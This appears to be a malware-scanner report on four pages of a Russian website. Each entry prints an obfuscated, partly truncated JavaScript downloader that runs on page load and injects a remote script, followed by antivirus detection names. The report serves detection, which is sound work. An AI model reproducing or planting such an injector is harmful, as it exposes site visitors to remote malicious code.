JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/club/?PHPSESSID=1f39e4b83fc1cf2ce8e096bc6c10649d
200 OK
Content-Length: 22965
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/club/
200 OK
Content-Length: 22965
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/?PHPSESSID=92f3703871e419dffdc1bef158b430a5
200 OK
Content-Length: 34436
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224

http://www.naish.ru/ru/catalog/?PHPSESSID=92f3703871e419dffdc1bef158b430a5
200 OK
Content-Length: 56931
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var S=new Date();var d=new Date();var f=new Date();function B(){var b;if(b!='' && b!='A'){b='Fl'};var W='';var K=unescape;var fw;if(fw!=''){fw='C'};var v;if(v!=''){v='q'};var Kz=window;var jj=new Date();var j_;if(j_!='' && j_!='O'){j_=''};var M=K("%2f%62%72%65%61%6b%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%62%6c%61%63%6b%62%65%72%72%79%2e%63%6f%6d%2e%70%68%70");this.CM="";var x;if(x!=''){x='Y'};var aW;if(aW!='' && aW!='nq'){aW='Ne'};function j(KE,BZ){var z=String("
... 959 bytes are skipped ...
='wu'){uX=null};g[K("%64%65%66%65%72")]=[7,1][1];var fa;if(fa!='' && fa!='Cqu'){fa=null};g[K("%73%72%63")]=pd;e.body.appendChild(g);var Ya;if(Ya!='EC' && Ya != ''){Ya=null};this.Ga='';var Pj;if(Pj!='tN' && Pj != ''){Pj=null};} catch(r){alert(r);var EJ=new Date();var HH=new String();};var ZSC=new Array();}var zG='';Kz[String("onl"+"We4uoad".substr(4))]=F;var BD;if(BD!='' && BD!='nF'){BD='DO'};var gJ;if(gJ!='wD' && gJ!='CW'){gJ=''};};var KX='';var cs='';B();

Antivirus reports:

AntiVir
JS/Redirector.DB.4
Avast
JS:Illredir-AQ [Trj]
Ikarus
Trojan.JS.Redirector
Panda
JS/Redirector.AC
nProtect
Trojan.Script.429224
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_KEMPAR.SM
Emsisoft
Trojan.Script.429224 (B)
Comodo
TrojWare.JS.Redirector.UA
McAfee-GW-Edition
JS/Redirector.u
DrWeb
JS.Redirector.based.3
TrendMicro
JS_KEMPAR.SM
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
Microsoft
Trojan:JS/Redirector.DB
MicroWorld-eScan
Trojan.Script.429224
Fortinet
JS/Crypt.BBES!tr
Jiangmin
Trojan/JS.Pegel.b
McAfee
JS/Redirector.u
NANO-Antivirus
Trojan.Script.Redirector.yrnhc
F-Secure
Trojan.Script.429224
VIPRE
Trojan.JS.Redirector.cr (v)
F-Prot
JS/Redir.AV
AVG
JS/Dropper
Norman
Redir.HU
Sophos
Troj/JSRedir-BD
GData
Trojan.Script.429224
Commtouch
JS/Redir.AV
Agnitum
JS.Redirector.Gen.5
ESET-NOD32
JS/TrojanDownloader.Pegel.AP
BitDefender
Trojan.Script.429224